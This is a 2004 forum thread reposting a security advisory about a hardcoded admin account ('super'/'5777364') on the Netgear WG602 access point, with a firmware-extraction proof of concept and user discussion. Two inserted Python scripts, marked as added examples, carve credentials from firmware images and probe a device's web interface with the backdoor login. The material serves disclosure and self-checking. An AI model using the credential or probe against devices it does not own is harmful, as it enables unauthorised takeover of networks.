Netgear Owners, Heads UP

  1. #1 Senior Member (joined Sep 2003, 500 posts)

    Just saw this on bugtraq. Netgear owners, check it out!

    KHAMSIN Security News
    KSN Reference: 2004-06-03 0001 TIP
    ---------------------------------------------------------------------------

    Title
    -----
    The Netgear WG602 access point contains an undocumented
    administrative account.

    Date
    ----
    2004-06-03


    Description
    -----------

    The web interface, which is reachable from both interfaces (LAN/WLAN),
    contains an undocumented administrative account that cannot be disabled.

    Any user logging in with the username "super" and the password "5777364"
    is in complete control of the device.

    This vulnerability can be exploited by any person who is able to reach
    the web interface of the device with a web browser.

    A search on Google revealed that "5777364" is actually the phone number
    of z-com Taiwan, which develops and offers WLAN equipment for its OEM
    customers.

    Currently it is unknown whether other Vendors are shipping products
    based on z-com OEM designs.


    Systems Affected
    ----------------

    Vulnerable (verified)
    WG602 with Firmware Version 1.04.0

    Possibly vulnerable (not verified)
    WG602 with other Firmware Versions
    WG602v2
    All other z-com derived WLAN access points


    Proof of concept
    ----------------

    Download the WG602 Version 1.5.67 firmware from Netgear
    ( http://kbserver.netgear.com/support....asp?dnldID=366 )
    and run the following shell commands on a UNIX box:

    $ dd if=wg602_1.5.67_firmware.img bs=1 skip=425716 > rd.img.gz
    $ zcat rd.img.gz | strings | grep -A5 -B5 5777364

    This results in the following output:

    %08lx:%08lx:%s
    %08lx%08lx%08lx%08lx
    Authorization
    BASIC
    super <---- Username
    5777364 <---- Password
    %02x
    Content-length
    HTTP_USER_AGENT
    HTTP_ACCEPT
    SERVER_PROTOCOL

    Disclaimer
    ----------

    This advisory does not claim to be complete or to be usable for
    any purpose. Especially information on the vulnerable systems may
    be inaccurate or wrong. Possibly supplied exploit code is not to
    be used for malicious purposes, but for educational purposes only.
    This advisory is free for open distribution in unmodified form.

    http://www.khamsin.ch



    ---------------------------------------------------------------
    KHAMSIN Security GmbH Zuercherstr. 204 / CH-9014 St. Gallen
    http://www.khamsin.ch
    You shall no longer take things at second or third hand,
    nor look through the eyes of the dead...You shall listen to all
    sides and filter them for your self.
    -Walt Whitman-
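
The advisory's proof of concept carves a gzip'd ramdisk out of the firmware image at a known byte offset and greps the strings for the password. The script below is an added example (not code from the KHAMSIN advisory or from the poster) that generalises that one-liner: it locates every gzip header in an image itself, mirrors `strings | grep -A5 -B5`, and also hunts for a Basic-auth credential without knowing the password, by looking at the string literals that follow the "Authorization"/"BASIC" literals a CGI compares against. The sample image it builds is constructed for the demonstration and is not real Netgear firmware; the offsets and header bytes in it are assumptions.

```python
"""Carve gzip streams out of a firmware image and hunt for hardcoded
credentials in the strings they contain.

Added example; this is not code from the KHAMSIN advisory or the forum
post.  It generalises the advisory's dd | zcat | strings | grep one-liner,
which needs the byte offset of the compressed ramdisk to be known in
advance, by locating every gzip header in the image itself.  The sample
image built by build_sample_image() is constructed here for the demo and
is not real Netgear firmware.
"""
import gzip
import re
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"                     # ID1, ID2, CM = deflate
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")  # what strings(1) prints by default


def find_gzip_streams(image):
    """Yield (offset, decompressed_bytes) for each complete gzip stream.

    A chance 1f 8b 08 inside unrelated data will either fail to inflate or
    never reach end-of-stream, so such candidates are skipped, not reported."""
    pos = 0
    while True:
        off = image.find(GZIP_MAGIC, pos)
        if off < 0:
            return
        inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)  # 16+ => gzip wrapper
        try:
            data = inflater.decompress(image[off:]) + inflater.flush()
            if inflater.eof:
                yield off, data
        except zlib.error:
            pass
        pos = off + 1


def strings(data, minlen=4):
    """Printable ASCII runs of at least `minlen` bytes, like strings(1)."""
    pat = PRINTABLE_RUN if minlen == 4 else re.compile(rb"[\x20-\x7e]{%d,}" % minlen)
    return [m.group().decode("ascii") for m in pat.finditer(data)]


def grep_context(image, needle, context=5):
    """Mirror `strings | grep -A5 -B5 NEEDLE` over every carved stream.

    Returns [(stream_offset, [strings around the hit]), ...]."""
    hits = []
    for off, blob in find_gzip_streams(image):
        table = strings(blob)
        for i, s in enumerate(table):
            if needle in s:
                hits.append((off, table[max(0, i - context): i + context + 1]))
    return hits


def basic_auth_literals(image):
    """Hunt without knowing the password: a Basic-auth check compiled into a
    CGI usually keeps the username and password as the string literals that
    follow the "Authorization" / "BASIC" literals it compares against.
    Returns [(stream_offset, user, password), ...] for each such pair."""
    found = []
    for off, blob in find_gzip_streams(image):
        table = strings(blob)
        for i in range(len(table) - 3):
            if table[i] == "Authorization" and table[i + 1].upper() == "BASIC":
                found.append((off, table[i + 2], table[i + 3]))
    return found


def build_sample_image():
    """Constructed stand-in for a firmware image: a fake 512-byte header, a
    gzip'd "ramdisk" holding the string table the advisory shows, padding."""
    table = [b"%08lx:%08lx:%s", b"%08lx%08lx%08lx%08lx", b"Authorization",
             b"BASIC", b"super", b"5777364", b"%02x", b"Content-length",
             b"HTTP_USER_AGENT", b"HTTP_ACCEPT", b"SERVER_PROTOCOL"]
    ramdisk = b"\x00".join(table) + b"\x00"
    header = b"SAMPLE-FW\x00" + b"\x00" * 502      # hypothetical header, 512 bytes
    return header + gzip.compress(ramdisk, mtime=0) + b"\xff" * 256


if __name__ == "__main__":
    img = build_sample_image()
    for off, ctx in grep_context(img, "5777364"):
        print(f"gzip stream at byte {off}:")
        for s in ctx:
            print("   ", s)
    print("Basic-auth literals:", basic_auth_literals(img))
```

Run against a real image, `basic_auth_literals()` is the part worth keeping: it flags the (user, password) pair even when nobody has told you which phone number to grep for, and `find_gzip_streams()` replaces the `skip=425716` that only holds for one firmware version.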

  2. #2 thehorse13, Master-Jedi-Pimps0r & Moderator (joined Dec 2002, Washington D.C. area, 2,884 posts)
    Looks like the home/small office router vendors are on the radar of the security community now...


    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  3. #3 AO Ancient: Team Leader (joined Oct 2002, 5,197 posts)
    Methinks the Linksys vulnerability kind of pales into insignificance compared to this one.

    Can the Netgear disable all access to the WAN configuration like the Linksys claims to?

    [Edit]

    Hoss: Spammers? As these things become more prevalent they need to find ways through them to get their "bounces" done.....

    [/Edit]
    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides

  4. #4 MrLinus, Just a Virtualized Geek (joined Sep 2001, Redondo Beach, CA, 7,324 posts)
    > Can the Netgear disable all access to the WAN configuration like the Linksys claims to?
    No. They don't think it's serious. When they came out with their RP114 routers, it was discovered that you could use the private address scheme on the WAN connection to access the router. They never considered it a serious issue (or so said an internal NetGear type to the SO when I queried about it).

    Thankfully, that password seems specific to models. Doesn't work on my RP114. I'll have to try the RP614 to see if it's affected (possibly not since neither of these are wireless).
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head

  5. #5 Zonewalker, Senior Member (joined Jul 2002, 949 posts)
    Well, I have an RP614v2 at home and it doesn't seem to work, so I'd concur with MsM on this... the WG602 is a wireless one, isn't it?
    Quis Custodiet Ipsos Custodes
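
Several posters above tested the "super" / "5777364" pair by hand against their own Netgear units. The script below is an added example (not code from the advisory or from any poster) that automates that check: it sends one anonymous request and one with an HTTP Basic Authorization header and classifies the device as open, accepting the credential, or rejecting it. Only the username/password pair comes from the advisory. The fake access point it starts on loopback is a constructed stand-in that honours exactly one hardcoded credential, so the script runs offline; the realm string and the page body are assumptions.

```python
"""Check whether a device's web interface accepts an undocumented HTTP
Basic account.

Added example; it is not code from the advisory or any poster.  It
automates the by-hand test several posters ran against their own Netgear
units.  Only the username/password pair comes from the advisory; the
fake access point below is a constructed stand-in that honours exactly
one hardcoded credential, so the script runs offline.
"""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def basic_header(user, password):
    """Value of the Authorization header for HTTP Basic auth (RFC 2617)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode("ascii")
    return "Basic " + token


def status_for(url, authorization=None, timeout=5.0):
    """HTTP status for a GET of `url`, with an optional Authorization header.
    urllib raises on 4xx/5xx; the status code is what we want, so unwrap it."""
    req = urllib.request.Request(url)
    if authorization:
        req.add_header("Authorization", authorization)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def probe(url, user, password):
    """Classify the device:
      'open'         - the page needs no authentication at all
      'accepted'     - anonymous is refused but user/password gets in
      'rejected'     - user/password is refused too
      'unexpected-N' - something other than 200/401 to an anonymous request
    Run it from both the LAN and the WLAN side; the advisory says the
    interface is reachable from both."""
    anon = status_for(url)
    if anon == 200:
        return "open"
    if anon != 401:
        return f"unexpected-{anon}"
    authed = status_for(url, basic_header(user, password))
    return "accepted" if authed == 200 else "rejected"


class FakeAccessPoint(BaseHTTPRequestHandler):
    """Constructed stand-in for a device with one hardcoded Basic account."""
    ACCEPTED = basic_header("super", "5777364")   # the pair from the advisory

    def do_GET(self):
        if self.headers.get("Authorization") == self.ACCEPTED:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html>admin page</html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="AP"')  # assumed realm
            self.end_headers()

    def log_message(self, fmt, *args):   # silence per-request logging
        pass


def start_fake_access_point():
    """Serve FakeAccessPoint on a random loopback port; returns (server, url)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeAccessPoint)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/"


if __name__ == "__main__":
    # Against a real unit, replace `url` with the AP's own address, e.g.
    # probe("http://<address-of-your-ap>/", "super", "5777364").
    srv, url = start_fake_access_point()
    try:
        print("advisory credential:", probe(url, "super", "5777364"))
        print("made-up credential: ", probe(url, "admin", "letmein"))
    finally:
        srv.shutdown()
```

An 'open' result matters as much as 'accepted': a unit that answers 200 to the anonymous request has no authentication to bypass in the first place, which is the RP114 WAN-side problem MrLinus describes.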

  6. #6 Senior Member (joined Sep 2003, 500 posts)
    The creepy thing is that the vendors who produced the parts put the backdoor in there. Just makes me wonder if anything else has a backdoor like this...mainly my stuff.

  7. #7 Zonewalker, Senior Member (joined Jul 2002, 949 posts)
    > Just makes me wonder if anything else has a backdoor like this...mainly my stuff.
    The cynical side of me says yes, very likely - probably lots of things. That is, at least in theory, one good thing about open source stuff - much more difficult to hide back doors.

  8. #8 Member (joined Apr 2003, 95 posts)
    Phew, doesn't seem to work on my Netgear DG834G. Let's hope it doesn't affect their whole range.

  9. #9 Senior Member (joined Sep 2003, 500 posts)
    Well, that is the thing about hardware. Especially for hardware where one can't flash the firmware. Then you have a nice solid backdoor that can't be fixed.
